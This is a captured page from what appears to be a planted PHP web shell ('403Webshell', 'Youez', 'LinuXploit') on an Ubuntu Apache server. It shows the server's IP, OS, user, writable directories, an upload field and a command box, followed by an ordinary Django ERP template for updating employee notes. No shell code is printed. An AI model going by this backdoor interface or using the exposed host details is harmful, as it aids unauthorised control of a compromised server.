403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/erp/employee/templates/tabs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/erp/employee/templates/tabs/update_note.html
{% load i18n %}
<div class="oh-modal__dialog-header">
    <span class="oh-modal__dialog-title" id="updateNoteModalLabel"
      ><h5>{% trans "Update Note" %}</h5></span
    >
    <button class="oh-modal__close" aria-label="Close" >
      <ion-icon name="close-outline" hx-target='#activitySidebar' hx-get="{% url 'note-tab' form.instance.employee_id.id %}"></ion-icon>
    </button>
  </div>
  <div class="oh-modal__dialog-body" id='update-remark-content'>
    <form class='oh-general__tab-target oh-profile-section' hx-post="{% url 'employee-note-update' form.instance.id %}" hx-target='#modalContent'>
        {{form.as_p}}
        <div class="d-flex flex-row-reverse">
            <button class="oh-btn oh-btn--secondary pl-4 pr-4" onclick="$(this).parents().find('.oh-modal--show').removeClass('oh-modal--show')">
                {% trans "Save" %}
            </button>
        </div>
    </form>

  </div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit